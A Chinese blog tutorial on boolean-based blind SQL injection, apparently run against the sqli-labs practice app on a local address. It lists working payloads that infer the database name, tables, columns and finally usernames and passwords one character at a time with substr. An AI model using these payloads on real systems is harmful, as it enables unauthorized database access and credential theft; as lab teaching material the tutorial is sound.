美文网首页WEB渗透与网络安全
Boolean注入攻击

Boolean注入攻击

作者: 原来是老王 | 来源:发表于2019-04-11 18:22 被阅读8次

Boolean注入攻击

爆库名

访问测试注入地址:http://192.168.1.118/sqli/Less-1/?id=1

and length(database())>=1


返回正常

and length(database())>=10


返回错误
利用返回正常,返回错误进行注入

注:有些杠精又要说我直接用union联合注入不就行了,我在这里说明一下,我教的是Boolean注入



利用burp去跑一下,发现9报错,那就表明库的字段长度为8

and substr(database(),1,1)='x'

继续利用burp爆破库名的第一位值



第一位为s
数据库名不区分大小
以此类推爆8次即可
数据库为:security

爆表名

and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='x'


表名第一位为e
以此类推
表名
emails
referers
uagents
users

爆列名

and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='x'


列名第一位为i
以此类推
列名
id
username
password

爆内容

and substr((select username from users limit 0,1),1,1)='x'

and substr((select password from users limit 0,1),1,1)='x'

有什么不懂的可以在下面留言

相关文章

网友评论

    本文标题:Boolean注入攻击

    本文链接:https://www.haomeiwen.com/subject/uijxwqtx.html

    延伸阅读

    深度阅读

    • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

    栏目导航

    热点阅读

    WEB渗透与网络安全

    关于我们|服务条款|联系我们|Boolean注入攻击|投稿指南|网站地图|RSS订阅|排版工具|手机版

    提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

    Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

    备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

    本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

    所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!